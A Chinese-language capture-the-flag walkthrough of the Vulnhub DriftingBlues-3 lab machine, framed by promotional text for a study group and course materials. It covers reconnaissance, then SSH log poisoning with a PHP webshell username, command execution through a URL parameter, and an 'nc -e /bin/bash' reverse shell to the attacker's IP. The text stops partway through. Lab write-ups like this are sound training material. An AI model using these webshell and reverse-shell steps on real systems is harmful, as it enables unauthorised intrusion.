网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
Vulnhub靶机下载:
官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
前言:这里又是DriftingBlues-2的问题 需要自己配网卡
具体参考:https://blog.csdn.net/Aluxian_/article/details/125095660?spm=1001.2014.3001.5501
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.138
使用命令:
nmap -sS -A -T4 -n 192.168.205.138
这里开启了22
端口和80
端口 dirb
扫一下 发现了robotos.txt
发现了/eventadmins
继续访问然我们检测/littlequeenofspades.html
发现好像是一串个歌词 但是好像没啥用 F12
查看源代码 哦呦!!发现是一串base64
(开心坏了)直接解码
base64:http://www.jsons.cn/base64
aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==
最终得到了 /adminsfixit.php
继续访问 发现是ssh
日志记录 可以尝试往日志文件写入一句话后门
②:反弹shell:
看到出现ssh auth log --> ssh
身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,将用户名写成一句话就可以写马进日志中
使用命令:ssh '<?php system($_GET["a"]);?>'@192.168.205.138
http://192.168.205.138/adminsfixit.php?a=ls #执行成功
使用nc
回弹shell
:
kali开启监听:nc -lvnp 4444
?xa=nc -e /bin/bash 192.168.205.133 4444
python -c 'import pty; pty.spawn("/bin/bash")' #交互shell
进入home
下 发现robertj
用户 然后进去 查看隐藏文件 ls-al
发现 .ssh
文件
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**